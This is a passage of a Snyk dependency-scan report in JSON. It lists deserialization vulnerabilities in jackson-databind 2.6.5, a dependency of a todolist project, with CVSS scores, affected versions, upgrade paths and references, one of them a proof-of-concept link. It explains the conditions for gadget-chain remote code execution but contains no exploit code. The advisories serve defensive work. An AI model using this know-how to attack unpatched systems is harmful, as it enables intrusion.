"2024-03-11T09:50:47.311633Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `br.com.anteros.dbcp.AnterosDBCPDataSource` (aka Anteros-DBCP).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2814)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Kamimuka/cve-2020-24616-poc)\n", - "epssDetails": { - "percentile": "0.85138", - "probability": "0.01172", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-24616" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-08-26T11:28:06.617646Z", - "functions_new": [ - { - "version": [ - "[2.9.4,2.9.10.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.jsontype.impl.SubTypeValidator", - "functionName": "validateSubType" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-08-26T11:26:14Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-08-26T14:27:29Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:50:47.311633Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.4", - "2.8.11.2", - "2.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2052", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:48:41.204259Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:36.643590Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:45.496040Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:41.204259Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:36.643590Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12022`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14723` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2052)\n", - "epssDetails": { - "percentile": "0.81303", - "probability": "0.00770", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-12022" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-cjjf-94ff-43w7", - "GHSA-wrr7-33fx-rcvj" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:11:34.234921Z", - "functions_new": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-05-29T17:00:04Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:00:03Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:36.643590Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.4", - "2.8.11.2", - "2.9.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0, 2.8.11.2)", - "[2.9.0, 2.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2032", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 5.6, - "modificationTime": "2024-03-11T09:47:14.962980Z" - }, - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:26.624837Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:53.818908Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.6, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:14.962980Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:26.624837Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It may allow content exfiltration (remote access by sending contents over ftp) when untrusted content is deserialized with default typing enabled. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-11307`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-14723`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2032)\n", - "epssDetails": { - "percentile": "0.85803", - "probability": "0.01278", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-11307" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-qr7j-h6gg-jmgc" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:14:00.916831Z", - "functions_new": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0, 2.8.11.2)", - "[2.9.0, 2.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-05-10T17:10:58Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:10:50Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:47:26.624837Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.4", - "2.8.11.2", - "2.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2058", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:31.058577Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 5.6, - "modificationTime": "2024-03-11T09:48:43.326081Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:39.092429Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:31.058577Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.6, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:43.326081Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12023`) is not identical to `CVE-2018-12018`, `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2058)\n", - "epssDetails": { - "percentile": "0.82708", - "probability": "0.00890", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-12023" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-6wqp-v4v6-c87c" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:16:09.944095Z", - "functions_new": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-05-29T17:15:50Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:15:49Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:43.326081Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.7)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2097", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:45.223431Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:22.234808Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:46.637612Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:45.223431Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:22.234808Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks via the ` slf4j-ext` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14718`) is not identical to `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate 